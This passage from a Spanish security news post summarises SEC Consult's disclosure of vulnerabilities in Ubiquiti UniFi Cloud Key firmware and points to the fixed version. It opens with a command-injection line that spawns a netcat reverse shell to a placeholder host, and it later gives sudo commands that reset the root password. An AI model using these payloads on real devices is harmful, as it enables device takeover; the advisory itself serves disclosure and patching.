;busybox nc <IP-Origen> <Puerto-Origen> -e /bin/bash;
http://enlace-utilizado-para-
En este punto se podría obtener la contraseña del usuario debido a un segundo fallo de seguridad: el fichero ‘system.cfg’ almacena los nombres de usuario y hashes MD5 de las contraseñas, los cuales se podrían romper en un tiempo razonable. Y, aunque el usuario de la interfaz web ‘www-data’ tiene permisos limitados de acceso y ejecución, sí puede leer dicho archivo de configuración.
Una vez obtenida la contraseña del usuario, sería posible modificar la configuración de la red inalámbrica.
Además existe una tercera vulnerabilidad que podría permitir secuestrar al usuario ‘root’ y elevar privilegios en el dispositivo. El fallo, ubicado en el fichero ‘/etc/sudoers.d/cloudkey-
$ cd /tmp
$ echo "root:password" > file.txt
$ /usr/bin/sudo /sbin/ubnt-systool chpasswd < file.txt
Aunque estos errores fueron descubiertos el pasado mes de Febrero por SEC Consult, la información no ha sido revelada hasta el momento para permitir una ventana temporal suficiente tanto para que el fabricante liberase una solución como para que los usuarios pudiesen actualizar sus dispositivos.
Se ha comprobado que las versiones 0.5.9 y 0.6.0, y potencialmente versiones anteriores, de Ubiquiti Networks UniFi Cloud Key son vulnerables. Para solucionar estos problemas es necesario instalar la actualización del firmware v0.6.1 o superior.
Más información:
Ubiquiti Networks UniFi Cloud Key multiple critical vulnerabilities
https://www.sec-consult.com/
UniFi Cloud Key firmware download
https://www.ubnt.com/download/
Juan José Ruíz
No hay comentarios:
Publicar un comentario